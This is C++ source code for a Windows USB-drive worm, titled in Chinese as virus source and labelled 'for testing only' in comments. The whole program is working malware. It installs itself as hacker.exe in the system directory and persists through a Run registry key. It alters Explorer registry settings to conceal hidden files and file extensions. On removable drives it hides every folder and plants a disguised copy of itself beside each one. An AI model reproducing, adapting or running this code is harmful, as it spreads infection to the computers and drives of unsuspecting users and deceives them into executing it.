一种U盘病毒源码
#include "stdafx.h"
#include <windows.h>
#include "resource.h"
/////////////////////////////////////////////////////
VOID DoBad(char DriveBuf[]);
VOID DoBad(char DriveBuf[])
{
CFileFind finder;
// build a string with wildcards
CString strWildcard(DriveBuf);
strWildcard += _T("*.*");
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hModule=GetModuleHandle(NULL);
GetModuleFileName(hModule,FileSource,MAX_PATH);
CloseHandle(hModule);
// start working for files
BOOL bWorking = finder.FindFile(strWildcard);
while (bWorking)
{
bWorking = finder.FindNextFile();
if (finder.IsDots())
continue;
// if it's a directory, recursively search it
if (finder.IsDirectory()&&!finder.IsSystem()&&!finder.IsHidden())
{
if(!SetFileAttributes(finder.GetFilePath(),FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM)) //| FILE_ATTRIBUTE_SYSTEM
continue;
sprintf(FileNew,"%s%s",finder.GetFilePath(),".exe");
CopyFile(FileSource,FileNew,TRUE);
}
}
finder.Close();
}
/////////////////////////////////////////////////////
#include <dbt.h>
char diskPath[5] = { 0 };
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam);
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
// char U[4];
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
DWORD allDisk = GetLogicalDrives();
if (allDisk!=0)
{
switch(wParam)
{
case DBT_DEVICEARRIVAL:
{
for (int i=0;i<40;i++)
{
if ((allDisk & 1)==1)
{
sprintf(diskPath, "%c", 'C'+i );
strcat(diskPath, ":\\" );
if (GetDriveType(diskPath)==DRIVE_REMOVABLE )
{
if( GetVolumeInformation(diskPath,0,0,0,0,0,0,0) )
{
//MessageBox( NULL,diskPath, "1",MB_OK );
DoBad(diskPath);
break;
}
}
}
allDisk = allDisk>>1;
}
}
break;
case DBT_DEVICEREMOVECOMPLETE:
MessageBox( NULL,"停止U盘", "病毒提示!",MB_OK );
break;
}
}
return LRESULT();
}
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam);
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
switch(message)
{
case WM_CREATE:
break;
case WM_DEVICECHANGE:
// if(modify_data.IsUpan)
OnDeviceChange(hWnd,wParam,lParam);
break;
case WM_CLOSE:
return FALSE;
case WM_DESTROY:
return FALSE;
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}
int CreateMyWindow();
int CreateMyWindow()
{
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="WebDown";
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=NULL;
wndc.hIcon=NULL;
wndc.hCursor=NULL;
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);
HWND hWnd=CreateWindow(szAppName,"hacker",
WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,NULL,NULL,NULL,NULL);
ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);
SendMessage(hWnd,WM_DEVICECHANGE,0,0);
while(GetMessage(&msg,NULL,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return 1;
}
/////////////////////////////////////////////////////
void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey);
void DeleteSubKeyTree(HKEY hKey, LPCTSTR lpSubKey)
{
LONG lResult;
HKEY hSubKey;
DWORD dwIndex, cbName;
char szSubKey[512];
FILETIME ft;
lResult = RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS,&hSubKey);
if (lResult != ERROR_SUCCESS)
{
RegCloseKey(hSubKey);
// return lResult;
}
dwIndex = 0;
cbName = sizeof(szSubKey)/sizeof(szSubKey[0]);
while (ERROR_SUCCESS == (lResult = RegEnumKeyEx(hSubKey, dwIndex, szSubKey, &cbName, NULL, NULL, NULL, &ft)))
{
DeleteSubKeyTree(hSubKey, szSubKey);
}
RegCloseKey(hSubKey);
lResult = RegDeleteKey(hKey, lpSubKey);
// return lResult;
}
void FuckReg();
void FuckReg()
{
HKEY hKey;
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden",&hKey);
TCHAR *valueA=_T("机器已经中毒了 本程序测试使用—JACK");
RegSetValueEx(hKey, "Text", NULL, REG_SZ, (LPBYTE)valueA, (DWORD) (lstrlen(valueA)+1));
RegCloseKey(hKey);
LPCTSTR lpSubKey1= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN";
HKEY hKey1 = HKEY_LOCAL_MACHINE;
DeleteSubKeyTree(hKey1, lpSubKey1);
LPCTSTR lpSubKey2= "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL";
HKEY hKey2 = HKEY_LOCAL_MACHINE;
DeleteSubKeyTree(hKey2, lpSubKey2);
HKEY hKey3;
RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",&hKey3);
DWORD valueA3=1;
RegSetValueEx(hKey3, "HideFileExt", NULL, REG_DWORD, (CONST BYTE *)(&valueA3),4);
RegCloseKey(hKey3); //关闭句柄
}
/////////////////////////////////////////////////////
#include <shellapi.h>
#pragma comment(linker, "/ALIGN:4096")
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
int main()
{
//////////////////////////////////////
char fullPath[MAX_PATH];
HMODULE hModule=GetModuleHandle(NULL);
GetModuleFileName(hModule, fullPath,MAX_PATH);
CString strPath=(CString)fullPath;
int ret=strPath.ReverseFind(_T('.exe'));
CString path=strPath.Left(ret-3)+_T("\\");
// MessageBox(path);
ShellExecute(NULL,"explore",path,NULL,NULL,SW_SHOWNORMAL);
// ShellExecute(NULL,"open",NULL,NULL,path,SW_SHOWNORMAL);
HANDLE m_hMutex=CreateMutex(NULL,FALSE,"ALALMN JACK 只做测试使用!!");
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
CloseHandle(m_hMutex);
m_hMutex=NULL;
ExitProcess(0);
}
///////////////////////////
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hModule1=GetModuleHandle(NULL);
GetModuleFileName(hModule1,FileSource,MAX_PATH);
CloseHandle(hModule1);
GetSystemDirectory(FileNew,MAX_PATH);
strcat(FileNew,"\\hacker.exe");
///////////////////////////
CopyFile(FileSource,FileNew,TRUE);
HKEY hkey=HKEY_LOCAL_MACHINE;
char lpSubKey[256]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
HKEY phkResult;
int len=sizeof(FileNew);
if(::RegOpenKeyEx(hkey,lpSubKey,0,KEY_ALL_ACCESS,&phkResult)!=ERROR_SUCCESS)
{
::RegCreateKeyEx(hkey,lpSubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_WRITE,NULL,&phkResult,NULL);
}
if (RegQueryValueEx(hkey,lpSubKey,NULL,NULL,(unsigned char *)&FileNew,(unsigned long *)&len)!=ERROR_SUCCESS)
::RegSetValueEx(phkResult,"hacker--JACK",0,REG_SZ,(LPBYTE)FileNew, (DWORD)(lstrlen(FileNew)+1));
::RegCloseKey(phkResult);
///////////////////////////
FuckReg();
CreateMyWindow();
//-------------------------
//while (1) //创建一个死循环,不然主线程退出
//{
// Sleep(1000);
//}
//---------------------
return 0;
}
